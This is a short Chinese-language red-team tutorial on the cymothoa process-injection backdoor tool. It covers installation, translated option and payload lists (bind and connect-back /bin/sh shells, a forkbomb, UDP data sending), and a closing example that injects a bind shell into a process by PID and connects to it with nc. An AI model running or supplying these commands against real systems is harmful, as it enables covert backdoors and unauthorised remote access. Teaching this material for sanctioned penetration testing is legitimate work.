黑客(红队)攻防中cymothoa后门的利用

https://sourceforge.net/projects/cymothoa/

apt update          # 更新软件包列表  apt install cymothoa  # 安装cymothoa

Main options | Injection options | Payload arguments

主要选项（Main options）:-p: 指定目标进程的PID（进程标识符）-s: 指定要注入的shellcode的编号-l: 指定用于shellcode注入的内存区域名称（默认为/lib/ld）-m: 指定用于持久性内存的内存区域名称（默认为/lib/ld）-h: 打印帮助屏幕-S: 列出可用的shellcodes注入选项（Injection options）:-f: 在注入后fork父进程-F: 在注入后不fork父进程-b: 创建一个payload线程-B: 不创建payload线程-w: 传递持久性内存地址给payload-W: 不传递持久性内存地址给payload-a: 使用alarm调度器-A: 不使用alarm调度器-t: 使用setitimer调度器-T: 不使用setitimer调度器Payload参数（Payload arguments）:-j: 设置定时器（秒）-k: 设置定时器（微秒）-x: 设置IP地址-y: 设置端口号-r: 设置第二个端口号-z: 设置用户名（4字节）-o: 设置密码（8字节）-c: 设置脚本代码

注入选项（Injection options）: 允许攻击者能更细致地控制注入过程。Payload参数（Payload arguments）:这些选项允许用户设置payload的具体行为。

bind /bin/sh to the provided port将/bin/sh绑定到指定的端口上。需要-y参数来指定端口号。bind /bin/sh + fork() to the provided port与上一个类似，但在接受连接后会fork一个新的进程。同样需要-y参数。bind /bin/sh to tcp port with password authentication将/bin/sh绑定到TCP端口，并需要密码认证才能连接。需要-y指定端口和-o指定密码。/bin/sh connect back使/bin/sh连接回指定的IP和端口。需要-x指定IP和-y指定端口。tcp socket proxy创建一个TCP套接字代理。需要-x, -y, 和-r参数。script execution执行提供的脚本代码。这可能会创建一个临时文件，需要在使用后手动删除。forks an HTTP Server在TCP端口8800上fork一个HTTP服务器。serial port busybox binding绑定到串行端口的busybox实例。这通常用于硬件攻击或特定场景的渗透测试。forkbomb一个简单的forkbomb，用于快速消耗系统资源。这主要用于演示或测试目的。open cd-rom loop无限循环地尝试打开CD-ROM驱动器。这主要用于恶作剧或测试系统的响应。audio (knock knock knock) via /dev/dsp通过/dev/dsp设备播放音频。这主要用于演示或引起注意。POC alarm() scheduled shellcode一个概念验证（Proof of Concept），使用alarm()函数调度的shellcode。POC setitimer() scheduled shellcode另一个概念验证，使用setitimer()函数调度的shellcode。alarm() backdoor使用alarm()函数创建的后门，绑定到指定端口并在接受连接时fork新进程。需要-j和-y参数。setitimer() tail follow使用setitimer()函数的tail跟随payload，通过UDP发送数据。需要-k, -x, 和-y参数。

https://sourceforge.net/projects/cymothoa/files/latest/download

./cymothoa -s 0 -p 2326 -y 5454

Nc -nvv xxx.xx.攻击机ip 5454